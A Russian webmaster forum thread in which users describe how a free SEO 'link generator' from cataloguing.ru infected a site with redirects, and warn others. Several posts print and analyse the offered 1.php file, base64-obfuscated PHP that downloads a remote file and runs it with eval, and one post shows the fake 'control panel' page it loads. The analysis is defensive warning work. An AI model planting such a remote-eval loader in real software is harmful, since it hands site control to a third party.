mrak7575

история как cataloguing.ru убил мой сайт

50 posts in this topic

всем привет!

поделюсь с вами одной историей.

В общем у меня есть сайт тематики адалт.

посещаемость 450-600 чел. в сутки 

Для продвижения покупаю ссылки и прочее. но вот на 1 из форумов

нашел статейку и там стаяли коментарии

типа: 

Советую всетаки старый проверенный 

сервис cataloguing(точка) ру

тиц на 50-60 растет после этих прогонов.

и множество положительных отзывов.

ну думаю дай ка я зайду на сайтик.

cataloguing(точка)ру

написано куча текста вроде нормальный сервис

предлагают скачать файлик (гениратор ссылок)

как любитель халявы я качаю и кидаю на сайт , 

запускаю показывается окно типа происходит регистрация 

бегают циферки и движется шкала.

вроде всё гуд.

в общем не дожидаясь окончания я вырубаю на 15% 

ну и жду индексации и прочего (было это в сентябре 2015) сайт имел тиц 10 и посещалка 450-600.

в декабре 2015 тиц обнулили ((. траф упал 350-400

я в панике ... ну ладно переживем ..

в январе затеял реконструкцию шаблона (чето делал не помню)

на компе стоит 2 браузера (для волидности проверяю на обоих , всё норм)

затем решил проверить как на телефоне показывается

открываю по своему адресу и бац открылся сайт cataloguing(точка)ру

Я в недоумении ! рекламы на сайте нет но чегото директ сработал

проверяю ещё раз все норм.

проверяю на вирусы на различных сайтах ____ всё норм 

странно!! ладно может "пенный напиток дал в мозг"

проходит пару дней решил почистить реестр

Далее запускаю программу CCleaner она сработала "гуд"

захожу на сайт свой и бац перекидывает на cataloguing(точка)ру

Удивление!!!

захожу заново всё гуд ...

чищу прогой копм

захожу перекидывает на cataloguing(точка)ру

и понимаю как я добравольно заразил сайт....

начинаю гуглить и пытаться найти решение

но чего то немогу

в этоге нашел на компе версию сайта за август месяц и благополучно востановил сайт.

редикт привел к куче отказов и понижении в выдаче

 

мораль сей истории

БЕСПЛАТНО только в мышеловке!

остерегайтесь халявы и сайта cataloguing (точка) ру

 

и наш форум тоже написали эту гадость 


и 


 

 

кстате я писал в тех поддержку результат 0.

 

вот переписка

 

mrak7575 (12.01.2016 21:32):

 

Доброе время суток , но мне кажется тут беда случается

вот темы


и 


 

 

продвигают это cataloguing.ru

 

есть такое подозрение что на этом сайте шейлы кидают на сайт

проверьте учетки которые пишут коменты .

ведь прогоны обычно за деньги делают , а тут прям бесплатный сервис и прочее ..

ну может я ошибаюсь ! но ведь бдительность не наказуема ))

срочный поставил так как чем меньше увидят темы тем лучше +

проверьте пожалуйста темосоздателей ))

может боты делают темы ?

Администрация (12.01.2016 21:48):

 

Уважаемый mrak7575!

Здравствуйте, Ваш запрос будет рассмотрен, спасибо за обращение.

 

С Уважением,

Прасковья Суровая

 

 

 

темы обе открыты до сих пор ! ))

 

 

 

Griffin, sheynhjk, Riminy and 1 other like this

Share this post


Link to post
Share on other sites

1. Сто раз уже говорили про прогоны...

2. На основе одного мнения тех поддержка выводов не делает, мы не знаем всей ситуации

3. Пользователь, который рекламировал уже давно забанен

Share this post


Link to post
Share on other sites

Вы молодец что написали об этом. Возможно кто то перед регистрацией у них, погуглит и встретит ваш пост

Share this post


Link to post
Share on other sites

я конечно не осуждаю тех. поддержку, просто написал что я упомянул им есть подозрения , разве по IP  нельзя определить что это скрытая реклама.

надеюсь администрация удалит те темы (так как при загугливании новые пользователи опять зарегаются на сайте по  "рекомендациям"

просто

я давно собирался с мыслями .

и сегодня что то решил по гуглить по форумам  и опять наткнулся  на комментарии.

сейчас пойду в антивируссники жаловаться !

и

 если вы хотите проверить достоверность моих слов то скачайте файл 

и поставьте на сайт (который не жалко) и  убедитесь (но это опасно ! ))

Share this post


Link to post
Share on other sites

я конечно не осуждаю тех. поддержку, просто написал что я упомянул им есть подозрения , разве по IP нельзя определить что это скрытая реклама.

надеюсь администрация удалит те темы (так как при загугливании новые пользователи опять зарегаются на сайте по "рекомендациям"

просто

я давно собирался с мыслями .

и сегодня что то решил по гуглить по форумам и опять наткнулся на комментарии.

сейчас пойду в антивируссники жаловаться !

и

если вы хотите проверить достоверность моих слов то скачайте файл

и поставьте на сайт (который не жалко) и убедитесь (но это опасно ! ))

По IP не проверишь....ТОР и остальные аноминайзеры делают свое дело. А насчет попробовать....ага, сейчас побегу на форум это чудо ставить :)

Share this post


Link to post
Share on other sites

Открыл их код файла (1.php), который они предлагают установить на сайт:

<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($B);eval($d); ?>

С виду,хоть и зашифровано, но на первый взгляд не вызывает подозрений. Он тянет и отображает на вашем сайте содержимое файла cataloguing.ru/work.txt (который также в base64) - а там "ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ". То есть, вроде бы все законно,вы открываете их файл у себя на хостинге - ваш_сайту.ру/1.php и видите эту самую безобидную ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ.

 

Но всмотритесь теперь в строчку кода:

$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;

Она добавляет к файлу 1.php возможность передать GET запросом (?q=) на ваш хостинг любые данные.

 

Таким образом, вы сами открываете возможность удаленным хакерам закачать вам шелл. Сигналом хакерам, что у них очередной улов, служит нажатие вами кнопки "Выполнить прогон", вы сами светите им свой домен, и к вам заходят (как по фтп). Занавес!

Share this post


Link to post
Share on other sites

По IP не проверишь....ТОР и остальные аноминайзеры делают свое дело. А насчет попробовать....ага, сейчас побегу на форум это чудо ставить :)

 

хм. я когда то  общался с тех поддержкой так меня уверяли что она все властна! а вы пишите что нет!

но если логически размышлять ! то

2 разных аккаунтах которые (1 -3 дня отроду ) пишут об 1 и том же ! это как бы вежливые спамщики (как то писал Воланд на форуме)

да и нужно насторожиться когда человек пользуется подобными (торами и др. методами сокрытия IP , конечно каждый имеет  право на сокрытие 

своих данных! но ! во главе администрации люди далеко не дилетанты 

ведь можно разработать какие то ограничения (если человек скрывает свой ip значит он не чист на руку  )

ведь куча тем что мошенники в сети 

Но тот кто повелся на этот развод то это вина тех кто повелся, а не администрации площадок где размещены" положительные комментарии"

прошу только эту темы не удалять ! 

чтоб уберечь остальных ! )

Share this post


Link to post
Share on other sites

Открыл их код файла (1.php), который они предлагают установить на сайт:

<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($;eval($d); ?>

С виду,хоть и зашифровано, но на первый взгляд не вызывает подозрений. Он тянет и отображает на вашем сайте содержимое файла cataloguing.ru/work.txt (который также в base64) - а там "ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ". То есть, вроде бы все законно,вы открываете их файл у себя на хостинге - ваш_сайту.ру/1.php и видите эту самую безобидную ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ.

 

Но всмотритесь теперь в строчку кода:

$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;

Она добавляет к файлу 1.php возможность передать GET запросом (?q=) на ваш хостинг любые данные.

 

Таким образом, вы сами открываете возможность удаленным хакерам закачать вам шелл. Сигналом хакерам, что у них очередной улов, служит нажатие вами кнопки "Выполнить прогон", вы сами светите им свой домен, и к вам заходят (как по фтп). Занавес!

большое спасибо за расстолкование php кода !

sairon likes this

Share this post


Link to post
Share on other sites

Открыл их код файла (1.php), который они предлагают установить на сайт:

 

<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($;eval($d); ?>
С виду,хоть и зашифровано, но на первый взгляд не вызывает подозрений. Он тянет и отображает на вашем сайте содержимое файла cataloguing.ru/work.txt (который также в base64) - а там "ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ". То есть, вроде бы все законно,вы открываете их файл у себя на хостинге - ваш_сайту.ру/1.php и видите эту самую безобидную ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ.

 

Но всмотритесь теперь в строчку кода:

$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;
Она добавляет к файлу 1.php возможность передать GET запросом (?q=) на ваш хостинг любые данные.

 

Таким образом, вы сами открываете возможность удаленным хакерам закачать вам шелл. Сигналом хакерам, что у них очередной улов, служит нажатие вами кнопки "Выполнить прогон", вы сами светите им свой домен, и к вам заходят (как по фтп). Занавес!

Хорошо, что на форуме есть подобного рода специалисты. Приятно читать, и да, очень интересно. Спасибо.

Griffin, mrak7575 and AlexBrush like this

Share this post


Link to post
Share on other sites

хм. я когда то  общался с тех поддержкой так меня уверяли что она все властна! а вы пишите что нет!

но если логически размышлять ! то

2 разных аккаунтах которые (1 -3 дня отроду ) пишут об 1 и том же ! это как бы вежливые спамщики (как то писал Воланд на форуме)

да и нужно насторожиться когда человек пользуется подобными (торами и др. методами сокрытия IP , конечно каждый имеет  право на сокрытие 

своих данных! но ! во главе администрации люди далеко не дилетанты 

ведь можно разработать какие то ограничения (если человек скрывает свой ip значит он не чист на руку  )

ведь куча тем что мошенники в сети 

Но тот кто повелся на этот развод то это вина тех кто повелся, а не администрации площадок где размещены" положительные комментарии"

прошу только эту темы не удалять ! 

чтоб уберечь остальных ! )

Тему удалять конечно не буду, тем более факт залива шелла доказан, а насчет тех поддержки, у нас огромное количество пользователей....предлагаете следить за каждым новорегом? мы тогда жить на пр су будем (хотя и сейчас почти живем)

webostrov and k-park like this

Share this post


Link to post
Share on other sites

сегодня по моей жалобе сайт cataloguing(точка) ру занесен в базу нежелательных сайтов )))

жду когда яндекс отпишится

Share this post


Link to post
Share on other sites

Вот спасибо за такую информацию теперь будем знать что не нужно им пользоваться.

zhekaglava likes this

Share this post


Link to post
Share on other sites

Открыл их код файла (1.php), который они предлагают установить на сайт:

<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($;eval($d); ?>

С виду,хоть и зашифровано, но на первый взгляд не вызывает подозрений. Он тянет и отображает на вашем сайте содержимое файла cataloguing.ru/work.txt (который также в base64) - а там "ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ". То есть, вроде бы все законно,вы открываете их файл у себя на хостинге - ваш_сайту.ру/1.php и видите эту самую безобидную ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ.

 

Но всмотритесь теперь в строчку кода:

$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;

Она добавляет к файлу 1.php возможность передать GET запросом (?q=) на ваш хостинг любые данные.

 

Таким образом, вы сами открываете возможность удаленным хакерам закачать вам шелл. Сигналом хакерам, что у них очередной улов, служит нажатие вами кнопки "Выполнить прогон", вы сами светите им свой домен, и к вам заходят (как по фтп). Занавес!

а как можно исправить это - спасти свой сайтик? тоже попался на их удочку 

Share this post


Link to post
Share on other sites

а как можно исправить это - спасти свой сайтик? тоже попался на их удочку 

Не ставить их кода. Если поставили - надо чистить сайт от шеллов, они могут быть в самых непредсказуемых местах.

mrak7575 likes this

Share this post


Link to post
Share on other sites

Не ставить их кода. Если поставили - надо чистить сайт от шеллов, они могут быть в самых непредсказуемых местах.

так случилось у меня в жизни что я из тех кто "уже там...", я неособо глубоко в этом разбираюсь, помогите пожалуйста, подскажите где хоть примерно нужно смотреть, или на чт ообратить внимание...сайт anomalii.net . заранее благодарен хоть за малейшую помощь  :rolleyes:

Share this post


Link to post
Share on other sites

так случилось у меня в жизни что я из тех кто "уже там...", я неособо глубоко в этом разбираюсь, помогите пожалуйста, подскажите где хоть примерно нужно смотреть, или на чт ообратить внимание...сайт anomalii.net . заранее благодарен хоть за малейшую помощь  :rolleyes:

Сканируйте сайт антивирусами: Логи лучше показать специалистам.

 

campusboy likes this

Share this post


Link to post
Share on other sites

 

Сканируйте сайт антивирусами: Логи лучше показать специалистам.

 

 

интересно было б услышать мнение хоть кого-то кто поборол эти вмешательства в сайт, ведь "взломщики" скорей всего ведь по каким-то шаблонам работают...

Share this post


Link to post
Share on other sites

народ пишите жалобы яндексу гуглу и антивируснику.

я написал ответ пришел только от доктора ВЕБА   , они внесли в список подозрительных

чем больше жалоб тем лучше будет!

накажем их вместе )))

Share this post


Link to post
Share on other sites

народ пишите жалобы яндексу гуглу и антивируснику.

я написал ответ пришел только от доктора ВЕБА   , они внесли в список подозрительных

чем больше жалоб тем лучше будет!

накажем их вместе )))

Репутация у них давно испорчена https://www.mywot.com/ru/scorecard/cataloguing.ru

Ставьте в браузер мою тулзу - всегда будете осведомлены о рисках на просматриваемых сайтах

Share this post


Link to post
Share on other sites

 

Сканируйте сайт антивирусами: Логи лучше показать специалистам.

 

 

Доброго времени суток! Подскажите, пожалуйста, как с Вам можно связаться по поводу заражения сайта ? ПМ в профиле отсутствуют...

Share this post


Link to post
Share on other sites

Доброго времени суток! Подскажите, пожалуйста, как с Вам можно связаться по поводу заражения сайта ? ПМ в профиле отсутствуют...

Мои контакты в моем профиле, жмите на аватарку

Share this post


Link to post
Share on other sites

Открыл их код файла (1.php), который они предлагают установить на сайт:

<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($;eval($d); ?>

С виду,хоть и зашифровано, но на первый взгляд не вызывает подозрений. Он тянет и отображает на вашем сайте содержимое файла cataloguing.ru/work.txt (который также в base64) - а там "ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ". То есть, вроде бы все законно,вы открываете их файл у себя на хостинге - ваш_сайту.ру/1.php и видите эту самую безобидную ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ.

 

Но всмотритесь теперь в строчку кода:

$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;

Она добавляет к файлу 1.php возможность передать GET запросом (?q=) на ваш хостинг любые данные.

 

Таким образом, вы сами открываете возможность удаленным хакерам закачать вам шелл. Сигналом хакерам, что у них очередной улов, служит нажатие вами кнопки "Выполнить прогон", вы сами светите им свой домен, и к вам заходят (как по фтп). Занавес!

 

 

Я не знаю что это за система вообще (не использовал никогда) но анализ кода был проведен не совсем коректно  :lol:

<?php
	// отключение отображения ошибок
	ini_set('display_errors', 'Off'); 
	error_reporting('E_ALL');

	$b = base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0'); // --> $b = 'http://cataloguing.ru/work.txt';
	$q = $_GET['q'];
	if ($q) $b. = base64_decode('P3E9').$q; // if ($_GET['q']) $b .= '?q=' . $_GET['q']; получаем такую ссылку --> http://cataloguing.ru/work.txt?q=test'>http://cataloguing.ru/work.txt?q=test
	$d = file_get_contents($; // --> Загружаем файл по полученной ссылке выше ^
	eval($d); // --> Выполняем загруженный файл как PHP ^ - здесь самая большая опасность, если администрация не добросовестная то тут может выполняться все что угодно

Код выше не позволяет любому загружать шелл, только тем кто владеет cataloguing.ru, так как вы не знаете что будет выполнено после загрузки файла (http://cataloguing.ru/work.txt) что само по себе очень опасно.

 

Копаем глубже.

Загружаем файл http://cataloguing.ru/work.txt:


header("Content-type: text/html; charset=UTF-8");echo base64_decode('<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ</title>
    <link href="http://cataloguing.ru/css/panel.css" rel="stylesheet" type="text/css" media="screen" />
    <link href="http://cataloguing.ru/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
    <script type="text/javascript">createPopup().show( 0, 0, 0, 0, 0 );</script>
</head>
<body oncontextmenu="return false;">
    <div id="main">
        <div id="new"><h1>ПАНЕЛЬ УПРАВЛЕНИЯ</h1><a href="http://cataloguing.ru"><img src="data:image/png;base64,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"></a></div>
        <div id="menu">
            <button onclick="get_data('catalog')">ПРОГОН ПО КАТАЛОГАМ</button>
            <button onclick="get_data('spr')">РЕГИСТРАЦИЯ В СПРАВОЧНИКАХ</button>
            <div id="res">Файл установлен корректно</div>
        </div>
        <div id="links"><a href="#">ТУТ БУДУТ ГЕНЕРИРОВАТЬСЯ ОБРАТНЫЕ ССЫЛКИ, ЕСЛИ БУДЕТ НУЖНО</a></div>
    </div>
    <script src="http://cataloguing.ru/js/panel.min.js"></script>
</body>
</html>');

И что мы видим ?

